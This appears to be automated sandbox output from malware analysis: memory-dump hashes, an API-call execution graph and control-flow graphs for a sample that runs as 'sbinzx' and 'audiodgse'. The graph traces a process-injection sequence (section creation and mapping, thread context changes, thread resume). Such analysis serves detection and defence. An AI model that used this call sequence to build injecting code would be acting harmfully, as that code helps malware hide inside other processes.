                                                                                • Instruction ID: d4e7fe351f067ce075fe66943fcda153f59a9c5f1f30c0b66b874c7b559a98fa
                                                                                • Opcode Fuzzy Hash: d1558bc33885baed851141dde2673dbd431cf77c18ad9d2a1d21d1e2aeef8939
                                                                                • Instruction Fuzzy Hash: 8F212871505208DFDB14DF10D9C4B26BB66FB94324F20C569DA090F2A6C33AE856CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1276951436.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_9fd000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b401b3a2e998c49d8a35780882a737615090b377f00b4ce325463c6b981e82fd
                                                                                • Instruction ID: a9cb1ef284d0f82da363c7d15f8cbc00713e33a900a38b3730a4b599cd54242b
                                                                                • Opcode Fuzzy Hash: b401b3a2e998c49d8a35780882a737615090b377f00b4ce325463c6b981e82fd
                                                                                • Instruction Fuzzy Hash: 2821F571709208DFDB19DF10D9C0B26BF67FB94324F248569EA090B256C33AD856DBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1277117198.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_a0d000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1dc0d9fe5eb636f262c005080df8bfa7d7c749ce0455d8d1f91bdaeb0589e847
                                                                                • Instruction ID: bb30e7c6d00c3c760e3cc67f929d968346b16dfa1441b8e64aa1cb256a9d1a95
                                                                                • Opcode Fuzzy Hash: 1dc0d9fe5eb636f262c005080df8bfa7d7c749ce0455d8d1f91bdaeb0589e847
                                                                                • Instruction Fuzzy Hash: C3210772A04308EFDB15DF94E9C0B65BB65FB88314F20C66DE8494F2D6C336D846CA61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1277117198.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_a0d000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e0bd955469661cc0039d80bd6554a49933ee4bf2421c8abe9ad0901e8a1ce4d
                                                                                • Instruction ID: 653d29fac9fc43fe2fc212612fba0086837bd825028f93101d55de5c5f8c7ac2
                                                                                • Opcode Fuzzy Hash: 8e0bd955469661cc0039d80bd6554a49933ee4bf2421c8abe9ad0901e8a1ce4d
                                                                                • Instruction Fuzzy Hash: 8521F276604308EFDB14DF54E9C4B16BB65FB84324F20C56DD84E4B286C336D847CA62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1277117198.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_a0d000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e8cf07043cc271d43b90ce482510e28161729a3949a48e00f1714132169c8563
                                                                                • Instruction ID: dfd6ba7c7d07379e20be88e498c17b70b1b7c4d9038842f0dc4c591a2c78187d
                                                                                • Opcode Fuzzy Hash: e8cf07043cc271d43b90ce482510e28161729a3949a48e00f1714132169c8563
                                                                                • Instruction Fuzzy Hash: D621A1765093848FCB06CF24D990715BF71EB46314F28C5DAD8498B6A7C33A980ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1276951436.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_9fd000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                • Instruction ID: bc487c7d80a9e4431dc9a46ea0b2658f878e47fbbee1cc72136fa88c9dd26c8f
                                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                • Instruction Fuzzy Hash: DD112676504244CFCB05CF00D5C0B26BF72FB94324F24C2A9D9090B6A6C33AE856CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1276951436.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_9fd000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                • Instruction ID: f948c4bd61e3e7f985202a336333d678522968d03e8f253d5324d8551bcc65e7
                                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                • Instruction Fuzzy Hash: 6E11E676608244CFCB15CF10D9C4B66BF72FB94324F24C5A9D9094B256C336D856CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1277117198.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_a0d000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                • Instruction ID: 7888d9ac56431d638ee39b9b60645b7ce93f0b826f8a4d43ea96a519b75a3664
                                                                                • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                • Instruction Fuzzy Hash: CA11DD76504284DFCB05CF54D5C0B55FBB2FB88324F24C6ADD8494B696C33AD80ACB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1276951436.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_9fd000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 220b427fa060a48105bcce012580b933e9ea820af6711612333e9d5c78bdeb11
                                                                                • Instruction ID: 397ee5146997268bd069f541b936e86af8e9f5ab427f6afbee522918db5b48b3
                                                                                • Opcode Fuzzy Hash: 220b427fa060a48105bcce012580b933e9ea820af6711612333e9d5c78bdeb11
                                                                                • Instruction Fuzzy Hash: 1701F7B10053489AF7206B21CCC4B36BB9DDF41335F14C51AEE184E282D2799845CBB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1276951436.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_9fd000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ec1942a8965e3e34839b1cf742e5517a5f1591b75fdef17b046bf91339a90a78
                                                                                • Instruction ID: f1d9be32095e2be3b8c585ab1afbc91491c4f81b3d1340f49f7b906d89251589
                                                                                • Opcode Fuzzy Hash: ec1942a8965e3e34839b1cf742e5517a5f1591b75fdef17b046bf91339a90a78
                                                                                • Instruction Fuzzy Hash: 83F06271405344AEF710AF15C888B62FF9CEF51734F18C55AED085E296C279AC45CBB1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:1.4%
                                                                                Dynamic/Decrypted Code Coverage:1.7%
                                                                                Signature Coverage:12.6%
                                                                                Total number of Nodes:412
                                                                                Total number of Limit Nodes:41
                                                                                execution_graph 96085 428003 96086 428027 96085->96086 96087 428078 96085->96087 96094 429113 96086->96094 96088 429113 LdrLoadDll 96087->96088 96090 42808e 96088->96090 96091 428044 96098 40ac53 96091->96098 96093 428071 96095 429122 96094->96095 96097 429188 96094->96097 96095->96097 96102 423ae3 96095->96102 96097->96091 96101 40ac78 96098->96101 96099 40ad95 NtReadFile 96100 40adcc 96099->96100 96100->96093 96101->96099 96103 423afd 96102->96103 96105 423af1 96102->96105 96103->96097 96105->96103 96107 423f63 LdrLoadDll 96105->96107 96106 423c4f 96106->96097 96107->96106 96108 4239e3 96109 4239f2 96108->96109 96110 423a36 96109->96110 96113 423a74 96109->96113 96115 423a79 96109->96115 96116 429f33 96110->96116 96114 429f33 2 API calls 96113->96114 96114->96115 96119 428443 96116->96119 96118 423a46 96120 42845d 96119->96120 96121 429113 LdrLoadDll 96120->96121 96122 42846e RtlFreeHeap 96121->96122 96122->96118 96520 423653 96521 42366f 96520->96521 96532 427e33 96521->96532 96524 423697 96527 428143 2 API calls 96524->96527 96525 4236ab 96526 428143 2 API calls 96525->96526 96528 4236b4 96526->96528 96529 4236a0 96527->96529 96536 42a053 LdrLoadDll RtlAllocateHeap 96528->96536 96531 4236bf 96533 427e4d 96532->96533 96534 429113 LdrLoadDll 96533->96534 96535 423690 96534->96535 96535->96524 96535->96525 96536->96531 96537 42b013 96538 42b023 96537->96538 96539 42b029 96537->96539 96540 42a013 2 API calls 96539->96540 96541 42b04f 96540->96541 96542 427ed3 96543 427ef7 96542->96543 96544 427f50 96542->96544 96546 429113 LdrLoadDll 96543->96546 96545 429113 LdrLoadDll 96544->96545 96548 427f66 96545->96548 96547 427f14 96546->96547 96551 40aa23 96547->96551 96550 427f49 96554 40aa48 96551->96554 96552 40ab65 NtCreateFile 96553 40aba4 96552->96553 96553->96550 96554->96552 96123 41d2e3 96124 41d309 96123->96124 96125 423ae3 LdrLoadDll 96124->96125 96126 41d35d 96125->96126 96132 41d6d6 96126->96132 96172 4284d3 LdrLoadDll 96126->96172 96128 41d3ae 96129 41d6be 96128->96129 96173 42b143 96128->96173 96130 429f33 2 API calls 96129->96130 96130->96132 96133 41d3cd 96133->96129 96134 41d4d6 96133->96134 96185 427863 96133->96185 96179 4183c3 LdrLoadDll LdrInitializeThunk 96134->96179 96138 41d501 96138->96129 96142 41d536 96138->96142 96197 4182b3 NtMapViewOfSection LdrLoadDll 96138->96197 96139 41d4bc 96143 429f33 2 API calls 96139->96143 96140 41d45c 96140->96132 96140->96139 96141 41d48b 96140->96141 96191 4182b3 NtMapViewOfSection LdrLoadDll 96140->96191 96192 428143 96141->96192 96180 426563 96142->96180 96144 41d4cc 96143->96144 96149 41d49b 96196 425623 NtDelayExecution LdrLoadDll 96149->96196 96150 41d558 96152 41d566 96150->96152 96153 41d69d 96150->96153 96198 4281d3 LdrLoadDll 96152->96198 96155 429f33 2 API calls 96153->96155 96156 41d6b4 96155->96156 96157 41d585 96199 41a143 96157->96199 96159 41d5ee 96159->96129 96160 41d5f9 96159->96160 96161 429f33 2 API calls 96160->96161 96162 41d61d 96161->96162 96206 427ad3 LdrLoadDll 96162->96206 96164 41d631 96207 427a03 96164->96207 96166 41d658 96167 41d65f 96166->96167 96216 427ad3 LdrLoadDll 96166->96216 96169 41d685 96217 427663 96169->96217 96171 41d693 96172->96128 96174 42b0b3 96173->96174 96176 42b110 96174->96176 96226 42a013 96174->96226 96176->96133 96177 42b0ed 96178 429f33 2 API calls 96177->96178 96178->96176 96179->96138 96181 4265c0 96180->96181 96182 4265fb 96181->96182 96233 418083 96181->96233 96182->96150 96184 4265dd 96184->96150 96186 42787d 96185->96186 96187 429113 LdrLoadDll 96186->96187 96188 42788e 96187->96188 96242 12a2c0a 96188->96242 96189 41d454 96189->96134 96189->96140 96191->96141 96193 428160 96192->96193 96194 429113 LdrLoadDll 96193->96194 96195 428171 NtClose 96194->96195 96195->96149 96196->96139 96197->96142 96198->96157 96200 41a160 96199->96200 96245 427953 96200->96245 96202 41a1b0 96203 41a1b7 96202->96203 96204 427a03 2 API calls 96202->96204 96203->96159 96205 41a1e0 96204->96205 96205->96159 96206->96164 96208 427a27 96207->96208 96209 427a7c 96207->96209 96211 429113 LdrLoadDll 96208->96211 96210 429113 LdrLoadDll 96209->96210 96215 427a92 96210->96215 96212 427a44 96211->96212 96258 40a7f3 96212->96258 96214 427a75 96214->96166 96215->96166 96216->96169 96218 427687 96217->96218 96219 4276bc 96217->96219 96221 429113 LdrLoadDll 96218->96221 96220 429113 LdrLoadDll 96219->96220 96222 4276d2 96220->96222 96223 4276a4 96221->96223 96222->96171 96262 40a1b3 96223->96262 96225 4276b5 96225->96171 96229 4283f3 96226->96229 96228 42a02e 96228->96177 96230 428410 96229->96230 96231 429113 LdrLoadDll 96230->96231 96232 428421 RtlAllocateHeap 96231->96232 96232->96228 96234 41804c 96233->96234 96235 4180b6 96233->96235 96238 428493 96234->96238 96237 41806b 96237->96184 96239 4284ad 96238->96239 96240 429113 LdrLoadDll 96239->96240 96241 4284ba ExitProcess 96240->96241 96241->96237 96243 12a2c1f LdrInitializeThunk 96242->96243 96244 12a2c11 96242->96244 96243->96189 96244->96189 96246 427974 96245->96246 96247 4279bd 96245->96247 96249 429113 LdrLoadDll 96246->96249 96248 429113 LdrLoadDll 96247->96248 96250 4279d3 96248->96250 96251 427991 96249->96251 96250->96202 96254 40a5d3 96251->96254 96253 4279b6 96253->96202 96257 40a5f8 96254->96257 96255 40a715 NtCreateSection 96256 40a744 96255->96256 96256->96253 96257->96255 96260 40a818 96258->96260 96259 40a935 NtMapViewOfSection 96261 40a970 96259->96261 96260->96259 96261->96214 96265 40a1d8 96262->96265 96263 40a2f5 NtResumeThread 96264 40a310 96263->96264 96264->96225 96265->96263 96266 4138a3 96267 4138a4 96266->96267 96274 4170a3 96267->96274 96269 4138da 96270 423ae3 LdrLoadDll 96269->96270 96271 4138f2 96270->96271 96272 413926 96271->96272 96273 413913 PostThreadMessageW 96271->96273 96273->96272 96275 4170c7 96274->96275 96276 417103 LdrLoadDll 96275->96276 96277 4170ce 96275->96277 96276->96277 96277->96269 96555 41a293 96563 427433 96555->96563 96557 41a2d7 96558 41a2f8 96557->96558 96570 4275d3 96557->96570 96560 41a2e8 96561 41a304 96560->96561 96562 428143 2 API calls 96560->96562 96562->96558 96564 427457 96563->96564 96565 427494 96563->96565 96566 429113 LdrLoadDll 96564->96566 96567 429113 LdrLoadDll 96565->96567 96568 427474 96566->96568 96569 4274aa 96567->96569 96568->96557 96569->96557 96571 42762c 96570->96571 96572 4275f7 96570->96572 96573 429113 LdrLoadDll 96571->96573 96574 429113 LdrLoadDll 96572->96574 96575 427642 96573->96575 96576 427614 96574->96576 96575->96560 96579 409b83 96576->96579 96578 427625 96578->96560 96582 409ba8 96579->96582 96580 409cc5 NtSuspendThread 96581 409ce0 96580->96581 96581->96578 96582->96580 96278 401b46 96279 401b5b 96278->96279 96282 42b4b3 96279->96282 96280 401bcc 96280->96280 96285 429b23 96282->96285 96286 429b49 96285->96286 96297 415fd3 96286->96297 96288 429b5f 96289 429bb0 96288->96289 96300 41a0b3 96288->96300 96289->96280 96291 429b7e 96292 429b93 96291->96292 96293 428493 2 API calls 96291->96293 96312 425ed3 96292->96312 96293->96292 96295 429ba2 96296 428493 2 API calls 96295->96296 96296->96289 96299 415fe0 96297->96299 96316 415f23 96297->96316 96299->96288 96301 41a0df 96300->96301 96341 417433 96301->96341 96303 41a0f1 96345 419fa3 96303->96345 96306 41a124 96309 41a135 96306->96309 96311 428143 2 API calls 96306->96311 96307 41a10c 96308 41a117 96307->96308 96310 428143 2 API calls 96307->96310 96308->96291 96309->96291 96310->96308 96311->96309 96313 425f2d 96312->96313 96315 425f3a 96313->96315 96373 417bd3 96313->96373 96315->96295 96323 424fa3 96316->96323 96320 415f46 96322 415f53 96320->96322 96330 428ab3 96320->96330 96322->96299 96324 424fb2 96323->96324 96325 423ae3 LdrLoadDll 96324->96325 96326 415f3a 96325->96326 96327 425003 96326->96327 96337 4283b3 96327->96337 96332 428acb 96330->96332 96331 428aef 96331->96322 96332->96331 96333 427863 2 API calls 96332->96333 96334 428b44 96333->96334 96335 429f33 2 API calls 96334->96335 96336 428b5d 96335->96336 96336->96322 96338 4283cd 96337->96338 96339 429113 LdrLoadDll 96338->96339 96340 425020 96339->96340 96340->96320 96342 417479 96341->96342 96355 4172c3 LdrLoadDll 96342->96355 96344 41750c 96344->96303 96346 41a099 96345->96346 96347 419fbd 96345->96347 96346->96306 96346->96307 96356 417383 96347->96356 96349 41a002 96361 4278b3 96349->96361 96351 41a047 96365 427903 96351->96365 96354 428143 2 API calls 96354->96346 96355->96344 96357 4173a8 96356->96357 96358 4173b3 96357->96358 96371 4172c3 LdrLoadDll 96357->96371 96358->96349 96360 4173fb 96360->96349 96362 4278d0 96361->96362 96363 429113 LdrLoadDll 96362->96363 96364 4278e1 96363->96364 96364->96351 96366 42791d 96365->96366 96367 429113 LdrLoadDll 96366->96367 96368 42792e 96367->96368 96372 12a35c0 LdrInitializeThunk 96368->96372 96369 41a08d 96369->96354 96371->96360 96372->96369 96375 417bfd 96373->96375 96398 41806b 96375->96398 96399 422ff3 96375->96399 96376 417c9c 96376->96398 96402 4139d3 96376->96402 96378 417d0a 96379 429f33 2 API calls 96378->96379 96378->96398 96381 417d22 96379->96381 96380 417d54 96382 41a143 3 API calls 96380->96382 96386 417d5b 96380->96386 96381->96380 96415 406ae3 96381->96415 96383 417d94 96382->96383 96385 427a03 2 API calls 96383->96385 96383->96398 96385->96386 96386->96398 96419 4274d3 96386->96419 96388 417df1 96428 427553 96388->96428 96390 417e11 96391 417ffa 96390->96391 96437 406b53 96390->96437 96393 427663 2 API calls 96391->96393 96394 41801d 96391->96394 96393->96394 96396 41803a 96394->96396 96442 41a313 96394->96442 96397 428493 2 API calls 96396->96397 96397->96398 96398->96315 96446 429ea3 96399->96446 96401 423014 96401->96376 96404 413a39 96402->96404 96408 4139f2 96402->96408 96403 413b47 96403->96378 96404->96403 96405 413b10 96404->96405 96462 413173 96404->96462 96405->96403 96479 41a3b3 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96405->96479 96408->96403 96408->96404 96410 41a313 2 API calls 96408->96410 96409 413b24 96409->96403 96480 41a3b3 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96409->96480 96410->96408 96412 413b3d 96412->96378 96413 413a76 96413->96405 96475 413433 96413->96475 96416 406b13 96415->96416 96417 41a313 2 API calls 96416->96417 96418 406b34 96416->96418 96417->96416 96418->96380 96420 4274f4 96419->96420 96421 427529 96419->96421 96423 429113 LdrLoadDll 96420->96423 96422 429113 LdrLoadDll 96421->96422 96427 42753f 96422->96427 96424 427511 96423->96424 96495 409d93 96424->96495 96426 427522 96426->96388 96427->96388 96429 4275a9 96428->96429 96430 427574 96428->96430 96431 429113 LdrLoadDll 96429->96431 96432 429113 LdrLoadDll 96430->96432 96433 4275bf 96431->96433 96434 427591 96432->96434 96433->96390 96499 409fa3 96434->96499 96436 4275a2 96436->96390 96441 406b73 96437->96441 96438 41a313 2 API calls 96438->96441 96439 406b9a 96439->96391 96440 406b93 96440->96391 96441->96438 96441->96439 96441->96440 96443 41a326 96442->96443 96503 427793 96443->96503 96445 41a351 96445->96394 96449 428273 96446->96449 96448 429ed4 96448->96401 96450 428294 96449->96450 96451 4282d9 96449->96451 96453 429113 LdrLoadDll 96450->96453 96452 429113 LdrLoadDll 96451->96452 96456 4282ef 96452->96456 96454 4282b1 96453->96454 96458 40b4e3 96454->96458 96456->96448 96457 4282d2 96457->96448 96460 40b508 96458->96460 96459 40b625 NtAllocateVirtualMemory 96461 40b650 96459->96461 96460->96459 96461->96457 96463 413183 96462->96463 96464 41317e 96462->96464 96465 429ea3 2 API calls 96463->96465 96464->96413 96468 4131a8 96465->96468 96466 41320f 96466->96413 96468->96466 96469 413215 96468->96469 96473 429ea3 2 API calls 96468->96473 96481 427813 96468->96481 96487 428363 96468->96487 96471 41323f 96469->96471 96472 428363 2 API calls 96469->96472 96471->96413 96474 413230 96472->96474 96473->96468 96474->96413 96476 41344f 96475->96476 96477 428363 2 API calls 96476->96477 96478 413455 96477->96478 96478->96405 96479->96409 96480->96412 96482 42782d 96481->96482 96483 429113 LdrLoadDll 96482->96483 96484 42783e 96483->96484 96493 12a2df0 LdrInitializeThunk 96484->96493 96485 427855 96485->96468 96488 428380 96487->96488 96489 429113 LdrLoadDll 96488->96489 96490 428391 96489->96490 96494 12a2c70 LdrInitializeThunk 96490->96494 96491 4283a8 96491->96468 96493->96485 96494->96491 96496 409db8 96495->96496 96497 409ed5 NtGetContextThread 96496->96497 96498 409ef0 96497->96498 96498->96426 96501 409fc8 96499->96501 96500 40a0e5 NtSetContextThread 96502 40a100 96500->96502 96501->96500 96502->96436 96504 4277b4 96503->96504 96505 4277e9 96503->96505 96507 429113 LdrLoadDll 96504->96507 96506 429113 LdrLoadDll 96505->96506 96508 4277ff 96506->96508 96509 4277d1 96507->96509 96508->96445 96512 40b0c3 96509->96512 96511 4277e2 96511->96445 96515 40b0e8 96512->96515 96513 40b205 NtDelayExecution 96514 40b221 96513->96514 96514->96511 96515->96513 96516 418288 96517 428143 2 API calls 96516->96517 96518 418292 96517->96518 96519 12a2b60 LdrInitializeThunk

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtResumeThread.NTDLL(Em@,?,?,?,?), ref: 0040A2FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID: Em@$Em@
                                                                                • API String ID: 947044025-2554913365
                                                                                • Opcode ID: 924fff367fa6401991851cade79ae657afef47bbfa0450e9ce26d8e55c2ee228
                                                                                • Instruction ID: 85c6a8cc764bef769d6b54aec114aa8962f0f5ad33b8bb524b5a4c5a15e8de4d
                                                                                • Opcode Fuzzy Hash: 924fff367fa6401991851cade79ae657afef47bbfa0450e9ce26d8e55c2ee228
                                                                                • Instruction Fuzzy Hash: 69716F70E04258DFCB05CFA9C490AEDBBF1BF49314F1880AAE859B7341D639AA52CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 90 40a5d3-40a637 call 409623 call 409633 95 40a715-40a73e NtCreateSection 90->95 96 40a63d-40a682 call 4096c3 call 42b532 call 409593 call 42b532 90->96 97 40a744-40a74b 95->97 98 40a7db-40a7e7 95->98 118 40a68d-40a693 96->118 101 40a756-40a75c 97->101 103 40a784-40a788 101->103 104 40a75e-40a782 101->104 107 40a7ca-40a7d8 call 4096c3 103->107 108 40a78a-40a791 103->108 104->101 107->98 110 40a79c-40a7a2 108->110 110->107 113 40a7a4-40a7c8 110->113 113->110 119 40a695-40a6b9 118->119 120 40a6bb-40a6bf 118->120 119->118 120->95 122 40a6c1-40a6dc 120->122 123 40a6e7-40a6ed 122->123 123->95 124 40a6ef-40a713 123->124 124->123
                                                                                APIs
                                                                                • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,al@,00000000,?,?,08000000), ref: 0040A731
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSection
                                                                                • String ID: al@
                                                                                • API String ID: 2449625523-163585342
                                                                                • Opcode ID: 05c385f531aabdaa977c039ebea9e0255afacf5223ae76a0776529adb443b6a4
                                                                                • Instruction ID: 5dea965d909257d01036f26d765c8013519cae975240de9c9ed746c4626fc7bd
                                                                                • Opcode Fuzzy Hash: 05c385f531aabdaa977c039ebea9e0255afacf5223ae76a0776529adb443b6a4
                                                                                • Instruction Fuzzy Hash: 99716C71E04258DFCB04CFA9C890AEDBBF1AF8D314F1880AAE459B7341D639A952CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 135 40aa23-40aa42 136 40aa48-40aa87 call 409633 135->136 137 40aa43 call 409623 135->137 142 40ab65-40ab9e NtCreateFile 136->142 143 40aa8d-40aad2 call 4096c3 call 42b532 call 409593 call 42b532 136->143 137->136 145 40aba4-40abab 142->145 146 40ac3b-40ac47 142->146 165 40aadd-40aae3 143->165 148 40abb6-40abbc 145->148 150 40abe4-40abe8 148->150 151 40abbe-40abe2 148->151 154 40ac2a-40ac38 call 4096c3 150->154 155 40abea-40abf1 150->155 151->148 154->146 157 40abfc-40ac02 155->157 157->154 161 40ac04-40ac28 157->161 161->157 166 40aae5-40ab09 165->166 167 40ab0b-40ab0f 165->167 166->165 167->142 168 40ab11-40ab2c 167->168 170 40ab37-40ab3d 168->170 170->142 171 40ab3f-40ab63 170->171 171->170
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: e38ae375841e360fcba657e072bb6e445f139d2dbba1fdb3aa1b9ad308e92266
                                                                                • Instruction ID: 377b93b8d273d76eb987415f8f9fe1f8066269769abed6c7d14f3358184a0a77
                                                                                • Opcode Fuzzy Hash: e38ae375841e360fcba657e072bb6e445f139d2dbba1fdb3aa1b9ad308e92266
                                                                                • Instruction Fuzzy Hash: 258160B1E04258DFCB04CFA9C890AEDBBF1AF4D304F18816AE559B7341D638A952CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 173 40a7f3-40a812 174 40a818-40a857 call 409633 173->174 175 40a813 call 409623 173->175 178 40a935-40a96a NtMapViewOfSection 174->178 179 40a85d-40a8a2 call 4096c3 call 42b532 call 409593 call 42b532 174->179 175->174 180 40a970-40a977 178->180 181 40aa07-40aa13 178->181 201 40a8ad-40a8b3 179->201 183 40a982-40a988 180->183 185 40a9b0-40a9b4 183->185 186 40a98a-40a9ae 183->186 189 40a9f6-40aa04 call 4096c3 185->189 190 40a9b6-40a9bd 185->190 186->183 189->181 192 40a9c8-40a9ce 190->192 192->189 195 40a9d0-40a9f4 192->195 195->192 202 40a8b5-40a8d9 201->202 203 40a8db-40a8df 201->203 202->201 203->178 205 40a8e1-40a8fc 203->205 206 40a907-40a90d 205->206 206->178 207 40a90f-40a933 206->207 207->206
                                                                                APIs
                                                                                • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406CA4,?,?,?,00000000), ref: 0040A95D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_audiodgse.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SectionView
                                                                                • String ID:
                                                                                • API String ID: 1323581903-0
                                                                                • Opcode ID: 80dcd4512c50aad6c853327037e388d2ab9beacbdc597a53d6ff5d902c41cc0f
                                                                                • Instruction ID: 2143325bbd80d39008e4f6f7469229d53bd023635a79bcbf8227d5ac819399f8
                                                                                • Opcode Fuzzy Hash: 80dcd4512c50aad6c853327037e388d2ab9beacbdc597a53d6ff5d902c41cc0f
                                                                                • Instruction Fuzzy Hash: 57714EB1E04258DFCB04CFA9C890AEEBBF1AF4D314F18816AE459B7341D638A952CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
